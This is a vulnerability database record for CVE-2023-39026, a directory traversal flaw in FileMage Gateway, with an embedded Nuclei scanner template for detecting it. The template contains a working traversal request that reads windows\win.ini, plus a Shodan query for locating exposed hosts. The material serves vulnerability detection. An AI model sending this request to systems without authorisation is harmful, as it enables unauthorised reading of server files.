{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-39026/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-39026/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-39026/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-39026/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-39026/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-39026"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-39026"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2023/CVE-2023-39026.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2023-39026\n\ninfo:\n  name: FileMage Gateway - Directory Traversal\n  author: DhiyaneshDk\n  severity: high\n  description: |\n    Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.\n  impact: |\n    An attacker can view, modify, or delete sensitive files on the system, potentially leading to unauthorized access, data leakage, or system compromise.\n  remediation: |\n    Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in FileMage Gateway.\n  reference:\n    - https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html\n    - https://securityonline.info/cve-2023-39026-filemage-gateway-directory-traversal-vulnerability/\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-39026\n    - https://www.filemage.io/docs/updates.html#change-log\n    - http://packetstormsecurity.com/files/174491/FileMage-Gateway-1.10.9-Local-File-Inclusion.html\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2023-39026\n    cwe-id: CWE-22\n    epss-score: 0.17919\n    epss-percentile: 0.97047\n    cpe: cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: microsoft\n    product: windows\n    shodan-query:\n      - title:\"FileMage\"\n      - cpe:\"cpe:2.3:o:microsoft:windows\"\n  tags: cve2023,cve,packetstorm,lfi,filemage,microsoft,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"contains_all(body,'bit app support','extensions','fonts')\"\n          - \"contains(content_type, 'text/plain')\"\n          - \"status_code == 200\"\n        condition: and\n# digest: 4a0a004730450220454f8b184ee5572457d5e765b792d98908f75943ce0fa8f1bfb1179c0cd18c4a02210097d745852befce8ab55e0100c4cd0c03debb9da2c10f04f314d895c7fb23e7b5:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2023-39026"
}